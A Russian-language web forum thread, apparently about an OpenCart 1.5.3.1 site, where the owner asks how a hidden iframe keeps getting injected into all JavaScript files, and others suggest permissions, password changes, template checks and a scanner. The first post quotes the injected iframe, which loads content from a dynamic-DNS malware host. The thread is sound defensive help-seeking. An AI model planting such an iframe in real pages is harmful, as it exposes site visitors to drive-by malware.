Перейти к содержанию
svan

Вредоносное ПО на сайте

Рекомендуемые сообщения

Три дня назад по бану на Google обнаружил вирус на сайте. Вот такая дрянь подставляется во все файлы из папки javascript:

<iframe width="55" height="55" style="width:100px;высота:100px;position:absolute;слева:-100px;top:0;" src="http://rxrla.ddns.name/46b2e4f7ff73218ac85.res?11"></iframe>

И url постоянно меняется. Чего только не пробовал и сайт переустанавливал из бекап и из "коробки" результат один - как только сайт начинает работать этот долбаный код опять появляется в файлах js. Базу данных очищал полностью, пароли менял, комп антивирусом проверял.

Откуда он лезет?

Вот сканер http://sitecheck.sucuri.net/scanner/ показывает, как только все файлы в javascript меняешь - все чисто, несколько кликов на сайте - опять вирусняк показывает.

Версия ОС 1.5.3.1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

444 на файл

пароль на фтп меняли?

на домене есть phpmyadmin, какая версия, какой там метод авторизации?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

AI-Болит v.20121221 — удаленькая искалка вредоносного ПО на хостинге.

Всем доброго времени!

В продолжение и по причине того,что сам зачастую сталкиваюсь (думаю,что и многие из вас,сами того не подозревая..исключая понятно господ "в теме")

с вредоносными и хакерскими скриптами,которые,как правило "вшиты" не только во фришные..но и к сожалению и в платные расширения и модули,шаблоны..огворюсь,совершенно не обязательно приобретенными непосредственно здесь (!) тем не менее,более чем комфортно чувствующими себя и работающими "на хозяина" на вашем же хосте,рекомендую воспользоваться (!! речи не может быть о рекламе) - AI-Bolit - это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.http://www.revisium.com/ai/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
444 на файл пароль на фтп меняли? на домене есть phpmyadmin, какая версия, какой там метод авторизации?
Вообще на какие файлы надо оставлять право на запись - по идее это выход.

Через базы вообще возможно заражение сайта? Если да, то что там искать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

сначала разберитесь с шаблоном. Откуда взяли, что как и почему. А то сколько прав не выставляй, а функционал вируса будет сидеть в шаблоне или движке.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Кстати, мне вот тоже интересно, может ли такой код в шаблонах, изменить потом и другие файлы на сайте?

Или будет работать, только на вне?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Что можно сказать, меняй хостера, меняй пароли...

Заменяй все что можно заменить чистым кодом или сравнивай изменения

Чисти свой ПК

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Подскажите как избавится от этого

:-D Вопрос, это только в админке или везде?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Nik159, руками, видимо. прямыми.

и, как всегда, - чистим комп, меняем пароли...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.